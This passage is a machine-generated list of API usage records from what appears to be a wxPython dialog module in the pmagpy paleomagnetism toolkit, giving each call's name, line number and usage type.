"wx.ICON_INFORMATION", "line_number": 245, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 249, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 249, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 256, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 261, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 261, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 262, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 275, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 276, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 280, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 284, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 290, 
"usage_type": "call"}, {"api_name": "wx.OK", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 290, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 296, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 298, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 298, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 299, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 301, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 301, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 302, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 305, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 315, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 322, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 322, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 324, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 326, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 329, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 329, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 330, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 333, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 333, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 351, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 364, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 364, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 372, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 372, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 372, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 382, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 392, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 401, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 401, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 402, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 416, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 416, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_add_dir_button", "line_number": 420, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 420, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 434, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 434, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 435, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 435, "usage_type": "attribute"}, 
{"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 439, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 439, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 442, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 447, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "wx.GridBagSizer", "line_number": 448, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 449, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 451, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 451, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMBOBOX", "line_number": 456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 457, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 457, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 459, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 460, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 463, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 463, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 467, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 467, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 469, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 469, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 470, "usage_type": "call"}, {"api_name": "wx.GridSizer", "line_number": 471, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 472, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 473, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 473, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 474, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 475, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 478, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 483, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 484, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 484, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", 
"line_number": 485, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 486, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 487, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 491, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 495, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 495, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 501, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 501, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 504, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 504, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 507, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 507, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 520, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 521, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 525, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 525, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 547, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 547, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 551, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 558, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 558, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 567, "usage_type": "call"}, {"api_name": "os.path", "line_number": 567, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 571, "usage_type": "call"}, {"api_name": "os.path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 589, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 589, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 700, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 700, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 703, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 705, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 705, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 716, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 716, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 716, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 757, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 757, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 758, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 758, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 761, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 761, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 767, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 770, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 770, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 773, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 773, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 776, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 776, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 780, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 787, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 787, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", 
"line_number": 790, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 790, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 795, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 795, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 800, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 800, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 807, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 807, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 810, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 810, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 813, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 813, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 814, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 814, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 815, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 818, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 818, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 821, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 821, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", 
"line_number": 834, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 836, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 837, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 838, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 841, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 854, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 858, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 858, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 944, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 944, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 945, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 945, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 947, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 947, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 950, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 950, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 950, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 950, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 960, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 960, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 961, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 961, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 964, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 964, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 968, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 968, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 971, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 971, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 974, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 974, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 977, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 977, 
"usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 981, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 981, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 988, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 988, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 993, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 993, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 996, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 996, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 999, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 999, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1012, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1016, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1034, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1034, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1036, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", 
"line_number": 1094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1098, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1098, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1100, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1100, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1102, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1102, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1105, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1105, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1105, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1115, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1115, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1116, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1119, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1119, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1122, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1123, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1123, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1126, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1126, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1129, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1133, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1133, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 1140, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 1141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1144, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1144, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1148, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1148, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1151, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1151, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1155, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1155, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1162, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1162, 
